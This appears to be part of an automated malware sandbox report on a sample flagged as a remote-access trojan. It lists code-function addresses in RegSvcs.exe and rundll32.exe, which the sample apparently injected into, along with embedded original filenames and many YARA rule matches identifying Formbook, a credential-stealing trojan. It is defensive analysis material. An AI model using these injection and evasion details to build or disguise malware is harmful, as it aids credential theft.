Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_012FF0CC 13_2_012FF0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_012570C0 13_2_012570C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0130132D 13_2_0130132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0123D34C 13_2_0123D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0129739A 13_2_0129739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_012552A0 13_2_012552A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_012F12ED 13_2_012F12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0126B2C0 13_2_0126B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01307571 13_2_01307571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_012ED5B0 13_2_012ED5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_013195C3 13_2_013195C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0130F43F 13_2_0130F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01241460 13_2_01241460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0130F7B0 13_2_0130F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01295630 13_2_01295630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_013016CC 13_2_013016CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_012E5910 13_2_012E5910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01259950 13_2_01259950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0126B950 13_2_0126B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_012BD800 13_2_012BD800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_012538E0 13_2_012538E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0130FB76 13_2_0130FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0126FB80 13_2_0126FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0128DBF9 13_2_0128DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_012C5BF0 13_2_012C5BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_012C3A6C 13_2_012C3A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01307A46 13_2_01307A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0130FA49 13_2_0130FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_012EDAAC 13_2_012EDAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01295AA0 13_2_01295AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_012F1AA3 13_2_012F1AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_012FDAC6 13_2_012FDAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01307D73 13_2_01307D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01253D40 13_2_01253D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01301D5A 13_2_01301D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0126FDC0 13_2_0126FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_012C9C32 13_2_012C9C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0130FCF2 13_2_0130FCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0130FF09 13_2_0130FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0130FFB1 13_2_0130FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01251F92 13_2_01251F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01213FD2 13_2_01213FD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01213FD5 13_2_01213FD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01259EB0 13_2_01259EB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04CFE4F6 15_2_04CFE4F6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04D02446 15_2_04D02446
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04CF4420 15_2_04CF4420
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04D10591 15_2_04D10591
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C50535 15_2_04C50535
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C6C6E0 15_2_04C6C6E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C4C7C0 15_2_04C4C7C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C74750 15_2_04C74750
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C50770 15_2_04C50770
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04CE2000 15_2_04CE2000
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04D081CC 15_2_04D081CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04D041A2 15_2_04D041A2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04D101AA 15_2_04D101AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04CD8158 15_2_04CD8158
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C40100 15_2_04C40100
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04CEA118 15_2_04CEA118
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04CD02C0 15_2_04CD02C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04CF0274 15_2_04CF0274
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C5E3F0 15_2_04C5E3F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04D103E6 15_2_04D103E6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04D0A352 15_2_04D0A352
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C40CF2 15_2_04C40CF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04CF0CB5 15_2_04CF0CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C50C00 15_2_04C50C00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C4ADE0 15_2_04C4ADE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C68DBF 15_2_04C68DBF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C5AD00 15_2_04C5AD00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04CECD1F 15_2_04CECD1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04D0EEDB 15_2_04D0EEDB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04D0CE93 15_2_04D0CE93
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C62E90 15_2_04C62E90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C50E59 15_2_04C50E59
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04D0EE26 15_2_04D0EE26
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C42FC8 15_2_04C42FC8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C5CFE0 15_2_04C5CFE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04CCEFA0 15_2_04CCEFA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04CC4F40 15_2_04CC4F40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C92F28 15_2_04C92F28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C70F30 15_2_04C70F30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04CF2F30 15_2_04CF2F30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C7E8F0 15_2_04C7E8F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C368B8 15_2_04C368B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C52840 15_2_04C52840
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C5A840 15_2_04C5A840
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C529A0 15_2_04C529A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04D1A9A6 15_2_04D1A9A6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C66962 15_2_04C66962
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C4EA80 15_2_04C4EA80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04D06BD7 15_2_04D06BD7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04D0AB40 15_2_04D0AB40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C41460 15_2_04C41460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04D0F43F 15_2_04D0F43F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04D195C3 15_2_04D195C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04CED5B0 15_2_04CED5B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04D07571 15_2_04D07571
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04D016CC 15_2_04D016CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C95630 15_2_04C95630
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04D0F7B0 15_2_04D0F7B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04CFF0CC 15_2_04CFF0CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C570C0 15_2_04C570C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04D0F0E0 15_2_04D0F0E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04D070E9 15_2_04D070E9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C5B1B0 15_2_04C5B1B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C8516C 15_2_04C8516C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C3F172 15_2_04C3F172
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04D1B16B 15_2_04D1B16B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C6B2C0 15_2_04C6B2C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04CF12ED 15_2_04CF12ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C552A0 15_2_04C552A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C9739A 15_2_04C9739A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C3D34C 15_2_04C3D34C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04D0132D 15_2_04D0132D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04D0FCF2 15_2_04D0FCF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04CC9C32 15_2_04CC9C32
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C6FDC0 15_2_04C6FDC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C53D40 15_2_04C53D40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04D01D5A 15_2_04D01D5A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04D07D73 15_2_04D07D73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C59EB0 15_2_04C59EB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C13FD2 15_2_04C13FD2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C13FD5 15_2_04C13FD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C51F92 15_2_04C51F92
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04D0FFB1 15_2_04D0FFB1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04D0FF09 15_2_04D0FF09
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C538E0 15_2_04C538E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04CBD800 15_2_04CBD800
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C59950 15_2_04C59950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C6B950 15_2_04C6B950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04CE5910 15_2_04CE5910
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04CFDAC6 15_2_04CFDAC6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04CEDAAC 15_2_04CEDAAC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C95AA0 15_2_04C95AA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04CF1AA3 15_2_04CF1AA3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04D07A46 15_2_04D07A46
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04D0FA49 15_2_04D0FA49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04CC3A6C 15_2_04CC3A6C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C8DBF9 15_2_04C8DBF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04CC5BF0 15_2_04CC5BF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C6FB80 15_2_04C6FB80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04D0FB76 15_2_04D0FB76
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_02B6D7FE 15_2_02B6D7FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_02B6E53C 15_2_02B6E53C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_02B59E60 15_2_02B59E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_02B52FB0 15_2_02B52FB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_02B52D90 15_2_02B52D90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_02B52D89 15_2_02B52D89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04AAA036 15_2_04AAA036
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04AAE5CD 15_2_04AAE5CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04AA2D02 15_2_04AA2D02
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04AA1082 15_2_04AA1082
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04AA8912 15_2_04AA8912
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04AAB232 15_2_04AAB232
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04AA5B32 15_2_04AA5B32
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04AA5B30 15_2_04AA5B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 012BEA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 01285130 appears 58 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 011AEA12 appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 012CF290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 01297E54 appears 111 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 0123B970 appears 280 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 01187E54 appears 97 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 04CCF290 appears 105 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 04C3B970 appears 280 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 04C85130 appears 58 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 04CBEA12 appears 86 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 04C97E54 appears 111 times
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, 00000000.00000002.2158150951.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMML.dll2 vs SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, 00000000.00000002.2162617003.00000000070D0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, 00000000.00000002.2156300043.000000000105E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, 00000000.00000002.2162157198.00000000057D0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMML.dll2 vs SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, 00000000.00000002.2158917960.0000000003F7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Binary or memory string: OriginalFilenamedKJy.exe: vs SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
